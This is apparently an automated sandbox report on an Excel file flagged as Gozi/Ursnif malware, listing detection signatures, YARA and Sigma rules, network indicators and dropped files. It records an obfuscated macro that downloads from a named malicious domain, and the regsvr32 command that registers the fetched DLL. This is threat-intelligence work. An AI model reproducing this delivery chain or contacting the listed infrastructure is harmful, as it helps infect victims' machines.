Loading ...

Play interactive tourEdit tour

Analysis Report document-1423769819.xls

Overview

General Information

Sample Name:document-1423769819.xls
Analysis ID:324305
MD5:1d20db444db998eae5a4970482e0f177
SHA1:dd4e3b177804910b5a42b4377a1913fcca85baad
SHA256:31d3a487f454a78f2ed78b95c309a6841052e010ea33fcc53f1faba5d22d11f6
Tags:goziSilentBuilderursnifxls

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found obfuscated Excel 4.0 Macro
Sigma detected: Microsoft Office Product Spawning Windows Shell
Yara detected hidden Macro 4.0 in Excel
Document contains embedded VBA macros
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Registers a DLL
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 1144 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • regsvr32.exe (PID: 2376 cmdline: regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
document-1423769819.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x502a2:$s1: Excel
  • 0x5131d:$s1: Excel
  • 0x389b:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
document-1423769819.xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis: Data: Command: regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll, CommandLine: regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1144, ProcessCommandLine: regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll, ProcessId: 2376

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: document-1423769819.xlsVirustotal: Detection: 33%Perma Link

    Software Vulnerabilities:

    barindex
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exeJump to behavior
    Source: global trafficDNS query: name: birdexim.com
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 103.21.59.169:443
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 103.21.59.169:443
    Source: Joe Sandbox ViewIP Address: 103.21.59.169 103.21.59.169
    Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZJump to behavior
    Source: unknownDNS traffic detected: queries for: birdexim.com
    Source: E0F5C59F9FA661F6F4C50B87FEF3A15A.0.drString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
    Source: 77EC63BDA74BD0D0E0426DC8F8008506.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
    Source: regsvr32.exe, 00000003.00000002.2097778604.0000000001DD0000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
    Source: document-1423769819.xlsString found in binary or memory: https://birdexim.com/ds/231120.gif
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
    Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: Enable Content X I Al " "," jR " A B C D E F G H I J K L M N O P Q R S T : 1 2 3 4 5 6 7
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: document-1423769819.xlsInitial sample: CALL
    Source: document-1423769819.xlsInitial sample: CALL
    Source: document-1423769819.xlsInitial sample: CALL
    Source: document-1423769819.xlsInitial sample: CALL
    Source: document-1423769819.xlsInitial sample: EXEC
    Found obfuscated Excel 4.0 MacroShow sources
    Source: document-1423769819.xlsInitial sample: High usage of CHAR() function: 18
    Source: document-1423769819.xlsOLE indicator, VBA macros: true
    Source: document-1423769819.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
    Source: classification engineClassification label: mal80.expl.evad.winXLS@3/11@1/1
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\61EE0000Jump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD873.tmpJump to behavior
    Source: document-1423769819.xlsOLE indicator, Workbook stream: true
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
    Source: document-1423769819.xlsVirustotal: Detection: 33%
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dllJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Yara detected hidden Macro 4.0 in ExcelShow sources
    Source: Yara matchFile source: document-1423769819.xls, type: SAMPLE

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting21Path InterceptionProcess Injection1Regsvr321OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading1LSASS MemorySystem Information Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferIngress Tool Transfer1SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting21LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    document-1423769819.xls34%VirustotalBrowse
    document-1423769819.xls11%MetadefenderBrowse
    document-1423769819.xls4%ReversingLabsDocument-Word.Trojan.Heuristic

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    SourceDetectionScannerLabelLink
    birdexim.com1%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    http://servername/isapibackend.dll0%Avira URL Cloudsafe
    https://birdexim.com/ds/231120.gif0%URL Reputationsafe
    https://birdexim.com/ds/231120.gif0%URL Reputationsafe
    https://birdexim.com/ds/231120.gif0%URL Reputationsafe
    https://birdexim.com/ds/231120.gif0%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    birdexim.com
    103.21.59.169
    truefalseunknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://servername/isapibackend.dllregsvr32.exe, 00000003.00000002.2097778604.0000000001DD0000.00000002.00000001.sdmpfalse
    • Avira URL Cloud: safe
    low
    https://birdexim.com/ds/231120.gifdocument-1423769819.xlsfalse
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    unknown

    Contacted IPs

    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs

    Public

    IPDomainCountryFlagASNASN NameMalicious
    103.21.59.169
    unknownUnited Arab Emirates
    394695PUBLIC-DOMAIN-REGISTRYUSfalse

    General Information

    Joe Sandbox Version:31.0.0 Red Diamond
    Analysis ID:324305
    Start date:29.11.2020
    Start time:04:51:31
    Joe Sandbox Product:CloudBasic
    Overall analysis duration:0h 4m 23s
    Hypervisor based Inspection enabled:false
    Report type:full
    Sample file name:document-1423769819.xls
    Cookbook file name:defaultwindowsofficecookbook.jbs
    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
    Number of analysed new started processes analysed:5
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • HDC enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Detection:MAL
    Classification:mal80.expl.evad.winXLS@3/11@1/1
    EGA Information:Failed
    HDC Information:Failed
    HCA Information:
    • Successful, ratio: 100%
    • Number of executed functions: 0
    • Number of non-executed functions: 0
    Cookbook Comments:
    • Adjust boot time
    • Enable AMSI
    • Found application associated with file extension: .xls
    • Found Word or Excel or PowerPoint or XPS Viewer
    • Attach to Office via COM
    • Scroll down
    • Close Viewer
    Warnings:
    Show All
    • Exclude process from analysis (whitelisted): dllhost.exe
    • Excluded IPs from analysis (whitelisted): 192.35.177.64, 2.20.142.209, 2.20.142.210
    • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, audownload.windowsupdate.nsatc.net, apps.digsigtrust.com, ctldl.windowsupdate.com, a767.dscg3.akamai.net, apps.identrust.com, au-bg-shim.trafficmanager.net
    • Report size getting too big, too many NtDeviceIoControlFile calls found.

    Simulations

    Behavior and APIs

    No simulations

    Joe Sandbox View / Context

    IPs

    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
    103.21.59.169document-1443146531.xlsGet hashmaliciousBrowse
      document-1443146531.xlsGet hashmaliciousBrowse
        document-1453508098.xlsGet hashmaliciousBrowse
          document-1453508098.xlsGet hashmaliciousBrowse
            document-1443646287.xlsGet hashmaliciousBrowse
              document-1443646287.xlsGet hashmaliciousBrowse
                document-1452240368.xlsGet hashmaliciousBrowse
                  document-1452240368.xlsGet hashmaliciousBrowse
                    document-1448493973.xlsGet hashmaliciousBrowse
                      document-1448493973.xlsGet hashmaliciousBrowse
                        document-144037925.xlsGet hashmaliciousBrowse
                          document-144037925.xlsGet hashmaliciousBrowse
                            document-14531360.xlsGet hashmaliciousBrowse
                              document-14531360.xlsGet hashmaliciousBrowse
                                document-1440220447.xlsGet hashmaliciousBrowse
                                  document-1440220447.xlsGet hashmaliciousBrowse
                                    document-1462939617.xlsGet hashmaliciousBrowse
                                      document-1462939617.xlsGet hashmaliciousBrowse
                                        document-1456864371.xlsGet hashmaliciousBrowse
                                          document-1456864371.xlsGet hashmaliciousBrowse

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            birdexim.comdocument-1443146531.xlsGet hashmaliciousBrowse
                                            • 103.21.59.169
                                            document-1443146531.xlsGet hashmaliciousBrowse
                                            • 103.21.59.169
                                            document-1453508098.xlsGet hashmaliciousBrowse
                                            • 103.21.59.169
                                            document-1453508098.xlsGet hashmaliciousBrowse
                                            • 103.21.59.169
                                            document-1443646287.xlsGet hashmaliciousBrowse
                                            • 103.21.59.169
                                            document-1443646287.xlsGet hashmaliciousBrowse
                                            • 103.21.59.169
                                            document-1452240368.xlsGet hashmaliciousBrowse
                                            • 103.21.59.169
                                            document-1452240368.xlsGet hashmaliciousBrowse
                                            • 103.21.59.169
                                            document-1448493973.xlsGet hashmaliciousBrowse
                                            • 103.21.59.169
                                            document-1448493973.xlsGet hashmaliciousBrowse
                                            • 103.21.59.169
                                            document-144037925.xlsGet hashmaliciousBrowse
                                            • 103.21.59.169
                                            document-144037925.xlsGet hashmaliciousBrowse
                                            • 103.21.59.169
                                            document-14531360.xlsGet hashmaliciousBrowse
                                            • 103.21.59.169
                                            document-14531360.xlsGet hashmaliciousBrowse
                                            • 103.21.59.169
                                            document-1440220447.xlsGet hashmaliciousBrowse
                                            • 103.21.59.169
                                            document-1440220447.xlsGet hashmaliciousBrowse
                                            • 103.21.59.169
                                            document-1462939617.xlsGet hashmaliciousBrowse
                                            • 103.21.59.169
                                            document-1462939617.xlsGet hashmaliciousBrowse
                                            • 103.21.59.169
                                            document-1456864371.xlsGet hashmaliciousBrowse
                                            • 103.21.59.169
                                            document-1456864371.xlsGet hashmaliciousBrowse
                                            • 103.21.59.169

                                            ASN

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            PUBLIC-DOMAIN-REGISTRYUSdocument-1443146531.xlsGet hashmaliciousBrowse
                                            • 103.21.59.169
                                            document-1443146531.xlsGet hashmaliciousBrowse
                                            • 103.21.59.169
                                            document-1453508098.xlsGet hashmaliciousBrowse
                                            • 103.21.59.169
                                            document-1453508098.xlsGet hashmaliciousBrowse
                                            • 103.21.59.169
                                            document-1443646287.xlsGet hashmaliciousBrowse
                                            • 103.21.59.169
                                            document-1443646287.xlsGet hashmaliciousBrowse
                                            • 103.21.59.169
                                            document-1452240368.xlsGet hashmaliciousBrowse
                                            • 103.21.59.169
                                            document-1452240368.xlsGet hashmaliciousBrowse
                                            • 103.21.59.169
                                            document-1448493973.xlsGet hashmaliciousBrowse
                                            • 103.21.59.169
                                            document-1448493973.xlsGet hashmaliciousBrowse
                                            • 103.21.59.169
                                            document-144037925.xlsGet hashmaliciousBrowse
                                            • 103.21.59.169
                                            document-144037925.xlsGet hashmaliciousBrowse
                                            • 103.21.59.169
                                            document-14531360.xlsGet hashmaliciousBrowse
                                            • 103.21.59.169
                                            document-14531360.xlsGet hashmaliciousBrowse
                                            • 103.21.59.169
                                            document-1440220447.xlsGet hashmaliciousBrowse
                                            • 103.21.59.169
                                            document-1440220447.xlsGet hashmaliciousBrowse
                                            • 103.21.59.169
                                            document-1462939617.xlsGet hashmaliciousBrowse
                                            • 103.21.59.169
                                            document-1462939617.xlsGet hashmaliciousBrowse
                                            • 103.21.59.169
                                            document-1456864371.xlsGet hashmaliciousBrowse
                                            • 103.21.59.169
                                            document-1456864371.xlsGet hashmaliciousBrowse
                                            • 103.21.59.169

                                            JA3 Fingerprints

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            7dcce5b76c8b17472d024758970a406bdocument-1322008235.xlsGet hashmaliciousBrowse
                                            • 103.21.59.169
                                            2019-07-05-password-protected-Word-doc-with-macro-for-follow-up-malware.docGet hashmaliciousBrowse
                                            • 103.21.59.169
                                            document-1353534916.xlsGet hashmaliciousBrowse
                                            • 103.21.59.169
                                            document-1443146531.xlsGet hashmaliciousBrowse
                                            • 103.21.59.169
                                            document-1359580495.xlsGet hashmaliciousBrowse
                                            • 103.21.59.169
                                            document-135688950.xlsGet hashmaliciousBrowse
                                            • 103.21.59.169
                                            document-1490425384.xlsGet hashmaliciousBrowse
                                            • 103.21.59.169
                                            document-1453508098.xlsGet hashmaliciousBrowse
                                            • 103.21.59.169
                                            document-1443646287.xlsGet hashmaliciousBrowse
                                            • 103.21.59.169
                                            document-1452240368.xlsGet hashmaliciousBrowse
                                            • 103.21.59.169
                                            document-1476538535.xlsGet hashmaliciousBrowse
                                            • 103.21.59.169
                                            document-1363041939.xlsGet hashmaliciousBrowse
                                            • 103.21.59.169
                                            document-1442977347.xlsGet hashmaliciousBrowse
                                            • 103.21.59.169
                                            document-1353330392.xlsGet hashmaliciousBrowse
                                            • 103.21.59.169
                                            document-1444203221.xlsGet hashmaliciousBrowse
                                            • 103.21.59.169
                                            document-1353428775.xlsGet hashmaliciousBrowse
                                            • 103.21.59.169
                                            document-1481025349.xlsGet hashmaliciousBrowse
                                            • 103.21.59.169
                                            document-1448493973.xlsGet hashmaliciousBrowse
                                            • 103.21.59.169
                                            document-1466544307.xlsGet hashmaliciousBrowse
                                            • 103.21.59.169
                                            document-144037925.xlsGet hashmaliciousBrowse
                                            • 103.21.59.169

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                            Category:dropped
                                            Size (bytes):58936
                                            Entropy (8bit):7.994797855729196
                                            Encrypted:true
                                            SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                            MD5:E4F1E21910443409E81E5B55DC8DE774
                                            SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                            SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                            SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                            Malicious:false
                                            Reputation:moderate, very likely benign file
                                            Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):893
                                            Entropy (8bit):7.366016576663508
                                            Encrypted:false
                                            SSDEEP:24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
                                            MD5:D4AE187B4574036C2D76B6DF8A8C1A30
                                            SHA1:B06F409FA14BAB33CBAF4A37811B8740B624D9E5
                                            SHA-256:A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
                                            SHA-512:1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
                                            Malicious:false
                                            Reputation:high, very likely benign file
                                            Preview: 0..y..*.H.........j0..f...1.0...*.H.........N0..J0..2.......D....'..09...@k0...*.H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0...*.H.............0..........P..W..be......,k0.[...}.@......3vI*.?!I..N..>H.e...!.e.*.2....w..{........s.z..2..~..0....*8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.*....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i....*.)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0...*.H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..|.Wv..(9..e...w.j..w.......)...55.1.
                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):326
                                            Entropy (8bit):3.1147363886328936
                                            Encrypted:false
                                            SSDEEP:6:kK+jFwwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:lkPlE99SNxAhUegeT2
                                            MD5:C8C07D251200250491D75F3E50A0BDA9
                                            SHA1:056649D36A37B9D3A13131A1CA0AFDEB84951C98
                                            SHA-256:866EFC63C6773CEF7DF46A239BD2220FFFE78D9B6A58D7E10489966510EE4A3D
                                            SHA-512:D4BAAF965705087B346480BC0FC561B20DB11B348ED7C9714C67CAD858D2EAE43DFF4C53771B98B25AC98FC543D3643821474E46A82B300FCFAB581C0516802F
                                            Malicious:false
                                            Reputation:low
                                            Preview: p...... ..........m.N...(....................................................... ..........Y.......$...........8...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.6.9.5.5.9.e.2.a.0.d.6.1.:.0."...
                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):252
                                            Entropy (8bit):3.0294634724686764
                                            Encrypted:false
                                            SSDEEP:3:kkFkl1o31fllXlE/QhzllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1UAYpFit:kKtvliBAIdQZV7eAYLit
                                            MD5:911C205DDA1F21AF95AAF49792199EF2
                                            SHA1:42B35340D8D29554DAE6C841212FE4E3295C1355
                                            SHA-256:C472C378E4A55D8259FB60C039E502952CEC40F86A4872B636B786C3BECAF316
                                            SHA-512:02F6D46AB630CB66DF50DEDA930B8A4B1AA614B661ADA9F1E49229BA457C31BCA41F8025BB12D3BDC8F0521EB76B2B4FA15D1025558D99FB70347540151312AE
                                            Malicious:false
                                            Reputation:low
